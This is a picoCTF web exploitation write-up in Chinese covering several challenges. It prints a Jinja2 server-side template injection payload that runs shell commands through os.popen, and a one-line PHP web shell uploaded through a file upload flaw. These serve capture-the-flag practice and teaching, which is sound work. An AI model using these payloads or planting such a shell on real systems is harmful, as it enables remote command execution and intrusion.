picoCTF #web exploitation

# picoCTF #web exploitation ## Inspect HTML 右鍵按下檢查元件，對，就是這麼簡單 ![image](https://hackmd.io/_uploads/SkgwYWn6Jg.png) ## WebDecode 到About頁面後，打開inspector，會發現一串編碼過的字，將他丟進Base64 Decoder即可解出 ![image](https://hackmd.io/_uploads/SyGvLaoT1l.png) ![image](https://hackmd.io/_uploads/B1t6I6ia1e.png) ## Unminify ![image](https://hackmd.io/_uploads/ByNSQm-1ex.png) ## Bookmarklet 進到頁面後，可以發現他給了一個JS的code，這時候就可以丟到console裡執行 ![image](https://hackmd.io/_uploads/rkEpPTo6Jl.png) ## IntroToBurp 這題我們要修改request，hint2說了他可能無法handle錯誤格式的請求，因此試著將otp參數直接刪除 ![image](https://hackmd.io/_uploads/B1d1qxh6kg.png) ## Local Authority 在request中看到這兩句，可以知道有一個頁面是admin.php，用post進去的話，要用到hash值為2196812e91c29df34f5e217cfd639881才能通過驗，接下來就用curl來做 ``` <form hidden action="admin.php" method="post" id="hiddenAdminForm"> document.getElementById('adminFormHash').value = "2196812e91c29df34f5e217cfd639881"; ``` ![image](https://hackmd.io/_uploads/SJ0k1W2ake.png) ## SSTI1 先嘗試是否有SSTI漏洞 ![image](https://hackmd.io/_uploads/r11g0yTa1e.png) ![image](https://hackmd.io/_uploads/B1YZCyapkx.png) 確定有後即可開始攻擊，輸入 ``` {{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}} ``` 發現flag檔案 ![image](https://hackmd.io/_uploads/B1LVCJp61l.png) 接下來將他cat出來 ``` {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} ``` ![image](https://hackmd.io/_uploads/rJf3Cka6kg.png) ## n0s4n1ty 1 這題主要是上傳漏洞，攻擊者可以上傳一句話木馬的php檔案 ``` <?php system($_GET['cmd']); ?> ``` 上傳後找到位置，再透過網址列執行指令即可操作受害電腦先找到flag的位置，題目說再/root資料夾裡，便使用```ls ..```找尋資料夾位置，再把flag```cat```出來 ![image](https://hackmd.io/_uploads/BkAr1Ip6Jx.png) ![image](https://hackmd.io/_uploads/rywuy86Tke.png) ![image](https://hackmd.io/_uploads/HyU_xvpTyg.png) ## Cookie Monster Secret Recipe 先找出cookie ![image](https://hackmd.io/_uploads/HkA24wa6yl.png) ㄟˊ好像有點眼熟?! ![image](https://hackmd.io/_uploads/B1_xHDaa1l.png)